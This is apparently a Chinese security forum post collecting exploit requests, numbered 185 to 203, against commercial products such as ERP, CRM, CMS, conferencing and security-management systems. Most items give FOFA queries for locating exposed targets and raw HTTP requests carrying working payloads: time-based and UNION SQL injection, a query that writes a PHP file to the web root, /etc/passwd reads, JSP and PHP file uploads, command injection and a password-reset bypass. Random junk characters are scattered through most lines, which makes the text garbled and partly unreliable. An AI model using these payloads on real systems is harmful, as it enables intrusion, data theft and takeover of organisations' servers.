insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')+ ^/ |4 {& t% z0 G( y
' P& J8 ~: b' k" M. ~) ?, H7 c- V) Z; L; E
185. 瑞友天翼应用虚拟化系统SQL注入
5 g: |2 w# l' D& \% \% Bversion < 7.0.5.1
; n( l$ h# N. R0 U& j9 B pFOFA:app="REALOR-天翼应用虚拟化系统"
( y2 |. Z5 S3 K2 ]/ n6 kGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
. ^1 z% R( h/ q& k3 h* _Host: host+ [5 u1 N v. L4 T5 a: t2 I3 P" C
0 y5 C+ J) f, K6 ^. {) M
: d7 | v% b2 ^- V# ?186. F-logic DataCube3 SQL注入% u+ O3 n& @; Y; o% J* T
CVE-2024-317504 w" S9 R: y: i# x7 E2 y
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统/ I! t! j G3 R* V, @
FOFA:title=="DataCube3"; T7 K1 D7 {2 t- x7 C, Z) G
POST /admin/pr_monitor/getting_index_data.php HTTP/1.17 a# W1 B* ?6 j
Host: your-ip
8 `$ g; Y- ^6 d: G6 W# c- bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0- P+ Y; `! B0 ~" \: I% T+ F* g1 s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8# n9 K, C- `% Z( T, A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! o# u$ {+ A g* ?7 H, QAccept-Encoding: gzip, deflate
# n8 ~) Y4 K! L% F& \Connection: close; K1 h+ B) U; z4 D9 s4 B; v% t
Content-Type: application/x-www-form-urlencoded C7 @ h" ]% b1 c
: _$ c! x$ |) H( g7 M, V1 R0 }" Mreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
7 C n0 c: J4 x
0 X, h: n+ G3 ^+ y" u g% X4 Z" S8 T) P' s0 V( [1 ~: `, a
187. Mura CMS processAsyncObject SQL注入; |( h& u" r% G9 V! f, p
CVE-2024-32640/ [+ X8 k S8 G$ q. a4 J5 O7 F
FOFA:"Mura CMS"/ J& Z. R, f! c$ l u* u6 v
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
; _: p; w& U8 b4 OHost: your-ip$ g, W9 ^% z4 g& s3 o
Content-Type: application/x-www-form-urlencoded t$ ~* Q, v& q* c( S% `, U( ~, }* N
( b. C. b# P# |
) F9 c, y) v: J9 l6 k) P1 v
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
l6 y! E6 r' [) m# y8 ?2 A( Y- I, E5 o# W: c% N; l
: M8 s @& q( ]" I188. 叁体-佳会视频会议 attachment 任意文件读取$ b7 i' `/ P- |2 n( a/ \' ]
version <= 3.9.77 s% S8 W- v+ L1 T
FOFA:body="/system/get_rtc_user_defined_info?site_id"
- @+ X5 J$ S" D7 `! hGET /attachment?file=/etc/passwd HTTP/1.16 x( n7 o, N" g! N0 T
Host: your-ip
* F/ z; t" J5 d5 k; X+ l( sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
7 M& {) n0 I; H6 a0 G qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 R5 l8 S, Y1 h+ m& ^. w; X
Accept-Encoding: gzip, deflate6 R1 u8 R: a) |' v+ B
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+ K, T; U+ W8 v3 y8 e; ~+ pConnection: close
' I, h! w& x0 N% `' W( \! v" u6 L( t% ~1 [* E: G' ~' G
1 H r! [+ `! i8 p: F
189. 蓝网科技临床浏览系统 deleteStudy SQL注入3 h" x$ A4 E/ a' V C2 u
FOFA:app="LANWON-临床浏览系统" s# ]6 {+ ? t4 e
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1, f( @: j2 I# R0 |. B
Host: your-ip
2 ]+ M* w0 o- P) n: q9 RUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
: ? e6 ~" F( ?8 L2 X, QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 Z. C4 o. e: Y7 S
Accept-Encoding: gzip, deflate3 X$ e; p& N) w) Y. P n$ a
Accept-Language: zh-CN,zh;q=0.9- v0 l: } H' ?4 E* ?0 \* h, b; i
Connection: close" V( e% _, M( \7 Y: E
8 S1 z" _' d# q5 ^# I" E
+ S& H# h# m4 v4 `# r0 o190. 短视频矩阵营销系统 poihuoqu 任意文件读取5 _* V8 `! d3 E7 O
FOFA:title=="短视频矩阵营销系统"; f! j( l6 M0 ~$ {' b; ]1 e. `
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
+ u X7 p5 G/ r% Y0 |# e% MHost: your-ip
: q' S5 e/ e% |0 c; tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
; h5 y6 E1 |9 D* H( j' w! g* PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
) L* S# D4 Z& `# c# y6 d; |Content-Type: application/x-www-form-urlencoded
: t: ?: E7 t3 M4 _- y! S4 n+ UAccept-Encoding: gzip, deflate9 j6 d' d. e1 z7 D
Accept-Language: zh-CN,zh;q=0.92 D. {$ A2 z# I8 ^# |& C8 J4 g
5 O; T3 }: x% Z1 P( Z+ r3 t
poi=file:///etc/passwd) j& f7 v- Q* l% R; T2 b1 k
& N5 G$ l# e( `8 K& V7 H; @- M: s6 K9 ]1 d
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入* t7 t2 W0 e& \8 d: @
FOFA:body="/CDGServer3/index.jsp"
- h( K9 m' C- d6 C; q5 _POST /CDGServer3/js/../NavigationAjax HTTP/1.1: `2 H* v7 h, F# `- G; D- n
Host: your-ip$ ^8 a1 {* R& G. V/ L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 H* V8 _6 X6 T( sContent-Type: application/x-www-form-urlencoded) q9 }& Z$ N% t( m% w
- ~0 Z' f2 [. Q
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
) T% \; x5 `. w+ `6 Q2 Z* C5 Z% m+ ^( s9 Z" V/ R
0 l8 O: u, G P$ O. T2 \
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传8 D. K* e$ F1 K: P3 w5 X2 P! w- u1 y
FOFA:title="用户登录_富通天下外贸ERP"9 u6 q! [; V n ]. S
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
x6 M0 O* \3 g& oHost: your-ip
) B1 A0 W% W C6 s* UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.366 m! X6 O' ?! ~& u0 @9 D
Content-Type: application/x-www-form-urlencoded" F/ Z6 \+ g; I. K; N* e6 O
* M0 h' ]9 l2 G: P! h( Y8 Y# S6 o9 v$ P& k3 Z( d
<% @ webhandler language="C#" class="AverageHandler" %>! k9 i- j; t" S! C* |4 b! ~
using System;
5 K! F1 H" B" |( o" J! pusing System.Web;
! o3 W1 Q$ r/ zpublic class AverageHandler : IHttpHandler* e& |* p {4 ?, ^. Y9 y- m0 z
{
% n+ C# L9 Z( P' T6 ]public bool IsReusable! R9 h5 u, g+ R. _/ m
{ get { return true; } }2 w/ s( E9 M' ^3 Q% b; y
public void ProcessRequest(HttpContext ctx)
& O; n8 n. }. Y! @! Z{# |( B) y( r' z0 x* ^1 z5 w D
ctx.Response.Write("test");) F1 e+ T! h) H# C& A1 o5 O
}3 K% G; N$ ?8 [
}" [& k# a. |' U; Q8 F! f9 T. d
. X4 C9 r; s% Y! B: m0 U1 F
! `. G% {$ K8 ^ [! ~
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行4 z8 A3 b1 U ~) O0 Y# Q; v
FOFA:body="山石云鉴主机安全管理系统") X i, y" f0 U, _% L
GET /master/ajaxActions/getTokenAction.php HTTP/1.1( }( X) x4 }/ {3 _! ~* _
Host:
6 c$ B+ s0 a' ~0 J$ K$ S# TCookie: PHPSESSID=2333333333333;
9 Q1 i( j: V$ V* Q' w6 T; lContent-Type: application/x-www-form-urlencoded X* ^) c- j, t; {5 M
User-Agent: Mozilla/5.0, M2 R8 D. |. i1 s& \
* o* B* K E# Z0 B1 N; C
" R, T' R n' e/ L, Z$ i3 t* hPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
) b$ ^5 d) n, v6 U9 z: F8 f# {' pHost:
1 [2 f6 E# Q/ W( t$ QUser-Agent: Mozilla/5.0" U3 l, _+ M( n7 |
Accept-Encoding: gzip, deflate
/ x) k0 e2 M B" x/ ^- UAccept: */*
: q- T- A! Q0 ^Connection: close0 T- `; y" _ H7 E& O
Cookie: PHPSESSID=2333333333333;
5 r, H; g/ V1 ?# C& @Content-Type: application/x-www-form-urlencoded8 g [/ ^9 H6 N" f$ w
Content-Length: 84( z( [+ x- ^" M, H1 |% G
- }2 G! V8 W0 R) R, \) wparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
! ~) G+ L5 t0 _( H, T) Y) M2 }* j9 ~, q1 ?* ~# E1 n6 Q! w
2 w7 }4 f$ M+ Z6 ]; G" u
GET /master/img/config HTTP/1.1
9 }; ^3 t( Z. A' _. d$ eHost:
" Y/ V) g0 {! c, T( ~User-Agent: Mozilla/5.0
& Z' n# O0 ~5 v5 d: a* L: E
) K+ o6 q- L2 v4 q, ^& y& `
1 |5 M/ ]& E5 z' t) g7 |194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
+ Y4 w3 c& M4 }8 a4 ]FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
0 J3 Z0 ] a: _+ d* g. i7 V
' J. i% s4 i2 n" o* KPOST /servlet/uploadAttachmentServlet HTTP/1.1
5 ^! A. d( w) M: u5 JHost: host
/ G$ _4 _$ w1 L# E0 e# @& hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.364 y! l/ l+ ~& C- q O# h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 ?- Q4 F2 s f) @$ c" [8 ZAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" h" f* Y+ h, w; g7 q. lAccept-Encoding: gzip, deflate
' ?1 d( h. E: _0 g4 i6 uConnection: close: h8 G2 D7 G6 e1 M. ]5 A$ _. j
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
8 G( o. b2 ]& i ^------WebKitFormBoundaryKNt0t4vBe8cX9rZk
" v2 P# y) ]5 c% [- ?* ?/ J
+ n$ ~6 Y' d# T! j8 ^3 [9 `Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
: H8 @, s4 [: t, T5 X8 ^8 T& Y% q% sContent-Type: text/plain
& C/ r' z4 ]- T3 _ b' c<% out.println("hello");%>* }3 T' h8 b5 D, @, ?
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
: m$ R6 G# m& [4 Y) ^& iContent-Disposition: form-data; name="json"
' B) ~& ~& _; N, F- y {"iq":{"query":{"UpdateType":"mail"}}}
1 `7 o4 s2 ?+ j8 P5 B4 ]( C------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
. {+ `+ F7 d G b) c& R6 `
0 k6 a W9 F8 f
. U3 B, m7 ^: y4 R2 O3 Z7 r/ ^195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
0 K" o# t5 ^& V+ S6 vFOFA:title=="飞鱼星企业级智能上网行为管理系统
+ }/ ^: k. {6 z* uPOST /send_order.cgi?parameter=operation HTTP/1.1
- s. g; F% S1 L7 o& j, zHost: 127.0.0.16 {2 |. O, J/ ~" ?1 d4 o' J( }
Pragma: no-cache$ a. x! F2 G* f5 J* h, N
Cache-Control: no-cache
8 L7 ^9 J7 {" U+ X: r* XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36* T% y- ]& h* o% j2 E& L
Accept: */*
9 o5 ]$ l' f9 @% h4 NAccept-Encoding: gzip, deflate3 w# f, N1 m% p# p) J/ w. R. ~
Accept-Language: zh-CN,zh;q=0.97 r; b7 \/ Q( H" U' j8 S
Connection: close* x5 [1 l# J% [5 R3 p
Content-Type: application/x-www-form-urlencoded: o A6 t. k; \9 m1 \1 [
Content-Length: 68- H" \0 M6 ?' s H
4 M" y' `5 z% T" x: |( s
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}; c' i# x$ A: a. I5 ^
e! r6 G1 g5 ?& _% M7 P# p0 d+ z. r9 E( Z3 W0 b* O ^1 A
196. 河南省风速科技统一认证平台密码重置" k% [9 q& a4 r* X' [
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
9 k& z' \0 G" `' ?8 F! A2 q+ YPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
# D0 ~# T% w; U! F% }& \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
! M+ p/ o( x+ E" P) iContent-Type: application/json;charset=UTF-8
, `3 ?. n% c: A- G" I6 AX-Requested-With: XMLHttpRequest
( [0 x6 n6 Z) S/ ]Host:) \: w ]6 T( L5 p* g# G' U) Y& v( ?
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
/ m4 j1 d; [2 G9 v) @; i+ WContent-Length: 45$ `2 y1 r j4 J4 c9 @
Connection: close
( ]! z: h m% ^ ]5 V
* l; n" v& [7 m{"xgh":"test","newPass":"test666","email":""}
* c/ G+ r% U1 C' P! X2 U( H. y; p5 B3 f7 x0 S% p( ]7 t
0 \: l9 x, R7 V ~
* O! `2 `6 `/ y3 N0 l2 m2 l0 W197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
# Q( s5 t5 m- @- [" VFOFA:app="浙大恩特客户资源管理系统"
$ D9 q# f, R* a; x( {. r; cGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.14 v$ u" u6 m G& R, {+ B
Host:
1 j# f- n" @5 S# s) _1 wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
/ g& g2 ^( p5 W& f5 D9 eAccept-Encoding: gzip, deflate
" f" K) b2 Z8 S' ~: IConnection: close
1 V# X' y3 M0 i1 x2 p' Q7 L3 s- E" L$ I+ c2 R( W8 ^3 D/ F
" P) v" \2 V# N: c! ^- q! _6 V+ P6 E! G: N. A3 O0 M8 l/ F
198. 阿里云盘 WebDAV 命令注入! N& Y, m2 ^+ c& }% j! {8 x
CVE-2024-296405 F) _- I* B9 _$ y4 Z e
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
( F- i3 @# A* O3 z3 _* c YCookie: sysauth=41273cb2cffef0bb5d0653592624cf64
" k6 ]1 Z- {* ]# ^Accept: */*
9 R7 N* W5 J; @' iAccept-Encoding: gzip, deflate
# y, I+ h0 H- m, B% AAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
8 {/ ]! a# V6 ~6 h& Z# M: kConnection: close
7 \$ U; o3 w; w) S) n
) y J) \" _1 Q+ b7 n4 I- ~9 j5 f8 L
& p# s i# D9 e: I$ ^199. cockpit系统assetsmanager_upload接口 文件上传
' C3 o# t3 d, G4 A X) g9 f
% ]$ c, F7 J# g- t: R8 X6 ^. l1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:( c) p* M! O/ e; f1 I. w6 p& @' M, p
GET /auth/login?to=/ HTTP/1.11 H& k" m7 f! e6 e: }! R
$ U' d7 I G( E/ `- U" Y
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
; A+ h! l5 W. L6 [1 \7 @: n H) q& s8 Q5 u
2.使用刚才上一步获取到的jwt获取cookie:6 i$ E- u+ ]0 t" P1 b1 @% z
2 X _" h2 C7 V1 }8 c% |) e9 dPOST /auth/check HTTP/1.1
1 B, n4 q0 `0 L" G& R" D& LContent-Type: application/json8 k; R$ g0 B4 O8 A, n! r7 N1 L, G5 a
( `% ]9 @# p; q& C/ e n6 u; N
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}% E1 r. f7 R8 r' X4 Y9 m$ @
6 Z% H; o5 Y! P& J响应:200,返回值:
N5 A! C( @2 w& r5 T$ NSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/+ C; v" p& f" D4 S8 z7 C
Fofa:title="Authenticate Please!"" w8 B3 D g/ P& F
POST /assetsmanager/upload HTTP/1.1" v7 ]; |* h0 T+ D5 z/ e( \
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3, K. H1 n7 Z& a" j( y
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92# y. t3 f7 k8 s4 c) R% I4 Z
\* \& G* |* s) X
-----------------------------36D28FBc36bd6feE7Fb3
# u( C& X4 }, s) I* i0 AContent-Disposition: form-data; name="files[]"; filename="tttt.php"
, {5 U y( V6 h$ X! _/ e% @Content-Type: text/php
7 h, H0 R3 j4 C& ~% T
7 `8 K1 M. ^$ w# P7 z<?php echo "tttt";unlink(__FILE__);?>
0 O X* l) p d& w0 y-----------------------------36D28FBc36bd6feE7Fb3
" S, u8 |* S: U! W0 d; \; x. L. NContent-Disposition: form-data; name="folder"
* W! D! L7 K! m
6 M6 t5 ~2 w4 H/ v) G8 n- {-----------------------------36D28FBc36bd6feE7Fb3--( t. \/ z1 ~* u2 g) z( h! e
9 u# b3 l+ B$ j+ H* [% j8 X
, d8 u9 W1 w, ?; V2 m/ w+ m/storage/uploads/tttt.php
) x; c! ]6 }% E+ C/ n& D+ v6 `# u6 L1 G" U: H
200. SeaCMS海洋影视管理系统dmku SQL注入
/ @ y! ?- W5 KFOFA:app="海洋CMS"
& v9 N$ Q: i5 S0 ]! _8 v1 U' bGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
$ L( q+ `7 v) t/ n: j( l0 T3 E$ pCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
6 o0 f$ C$ R+ J6 `! |Upgrade-Insecure-Requests: 18 H2 K! Q: [1 E. X$ E7 C9 k
Cache-Control: max-age=02 }2 N) W: e: {& m2 F c9 M3 b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* D0 d# N0 E8 C( o$ @6 m' @
Accept-Encoding: gzip, deflate% w3 C$ e& i* n% v
Accept-Language: zh-CN,zh;q=0.9& j! A+ B c/ w8 t0 G
% ^7 t: t @" O! S! `
+ r% L) W2 N- c201. 方正全媒体新闻采编系统 binary SQL注入% @8 J& B% K5 \) e! k- g3 [
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"/ _6 T5 s* i4 a. m- }
POST /newsedit/newsplan/task/binary.do HTTP/1.1
5 s' F$ d# {+ t& q X! n6 XContent-Type: application/x-www-form-urlencoded
$ p2 r) Y$ d$ a3 v6 yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ Z ^: b1 {* F$ ^' [% K
Accept-Encoding: gzip, deflate. o' E: G4 z" u1 r+ W
Accept-Language: zh-CN,zh;q=0.9
2 @8 v0 n& v: S8 R# }Connection: close9 h& e& p2 }% d5 |# C: K
) f+ b4 H% z F, k! u; c3 [) O& u0 HTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1: p% p/ U: [4 ?
$ I) N% u- s0 |: _
$ x- M$ X4 w4 v$ l& h& _$ V
202. 微擎系统 AccountEdit任意文件上传
* X, s1 o( P! ^& H6 OFOFA:body="/Widgets/WidgetCollection/"
2 f9 e) s& }! o! S! F获取__VIEWSTATE和__EVENTVALIDATION值 U! D0 F& V0 Y4 H( A
GET /User/AccountEdit.aspx HTTP/1.1
0 K! ~3 t$ U" ]9 b2 y* v+ THost: 滑板人之家# \* V) P" l4 h6 p3 O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31; O1 b" D0 Z9 b
Content-Length: 05 J- K3 R) S' s( _& {" K
/ }, Q6 o, F5 p4 v8 k5 ?. n0 l8 a- s7 O8 w% g* C! c
替换__VIEWSTATE和__EVENTVALIDATION值8 ?* }1 v* V6 n6 ^/ z# T7 _# v
POST /User/AccountEdit.aspx HTTP/1.1" I0 C2 L2 k6 y" k
Accept-Encoding: gzip, deflate, br
+ k7 n) b* Y" X, ]9 iContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687; c+ |! D& A% M0 v, E. k; N, }
1 c& M& g" L$ I1 x/ \" X1 J9 r2 M
-----------------------------786435874t385875938657365873465673587356870 L5 x, P0 K: N- ~( K, ^9 f
Content-Disposition: form-data; name="__VIEWSTATE"2 v+ R) b- b/ K
$ e, d0 N& h6 U
__VIEWSTATE
* ]0 ~8 ?; _" y$ q* K2 y-----------------------------786435874t38587593865736587346567358735687
' B! p& x0 k$ u- L6 w0 [Content-Disposition: form-data; name="__EVENTVALIDATION"
4 Y; M7 c( s X. ]; H9 `% p3 s$ E! O+ W- T* i9 S, n. X
__EVENTVALIDATION2 m1 K+ r; Z! R& ]& @1 P# b+ ?
-----------------------------786435874t385875938657365873465673587356870 N( B1 Y7 _. E8 L" D
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
/ x' b. b0 y' ^ DContent-Type: text/plain
! `$ B g2 S) p) _7 [
* l" X6 F3 g& vHello World!
( U' v; T( Q" D. s" l-----------------------------786435874t38587593865736587346567358735687
* P( r, l, @+ {# H. k1 qContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
5 h" e' \& t( u! `1 u4 ^/ e' A+ r+ ^
$ C# q B+ j# M上传图片" F2 Q6 n( K4 F! Q5 p
-----------------------------786435874t38587593865736587346567358735687; ?% t" P. e- a7 h' T+ b
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
( G* d% K, s3 h# g/ B. ?9 y+ |4 ^& K0 f
1 U' D1 K% A) K& p) n! ]$ ]- }
-----------------------------786435874t38587593865736587346567358735687# X) R; \$ T% C1 x
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
1 j+ f v# ]+ T& C
2 G o" \- x* T; j# a+ K: l
# j3 [# A: J% ^* D( Q7 Y# a+ O; K8 ?% @-----------------------------786435874t38587593865736587346567358735687--6 u J* T, _6 s6 [! ]
5 a/ W/ K; y6 J; |' r. P+ F6 n% L* m- ]% C
/_data/Uploads/1123.txt$ E+ W$ }8 b# T O( G
/ \; b8 F" z* L3 A203. 红海云EHR PtFjk 文件上传4 H% u! K0 L" J; U
FOFA:body="RedseaPlatform"
) h* { [5 k; S! M+ p+ X4 SPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
" `/ b2 E/ }, W6 YHost: x.x.x.x
, }( z& w6 z: u2 m6 B; U" XAccept-Encoding: gzip
: g" A- S: }0 i3 i+ b) ?$ dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" \% b) p- ]' s
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys41 R" y" ^) {, t! M- ~2 N: { _# k' K
Content-Length: 210# Q* u( Q( m" A5 J
- }/ G5 l* o0 T" e------WebKitFormBoundaryt7WbDl1tXogoZys48 Z" [1 y- c; n- j E
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
4 f, b7 K- v7 w/ y+ x5 p% Q6 M2 x2 lContent-Type:image/jpeg
& G1 Q$ Z' j P0 V# H' x) D; [
+ j) t5 m1 V6 }4 u<% out.print("hello,eHR");%>
, a3 e% u, ?! N: x% O! ]------WebKitFormBoundaryt7WbDl1tXogoZys4--- V! A8 } a# |/ H% H3 A+ B
) }" n/ y x, w4 q8 D( p# }
/ n# b2 b" I" p+ Y- t2 G& I
5 M. X: K" e' t) q1 R( G$ b! n- B; p' H0 e9 D7 P
+ D" X$ W/ B+ ?, p' ^# `
( f2 b, \9 W/ P; F( v |
发表于 2024-6-5 14:31:29
收藏
支持
反对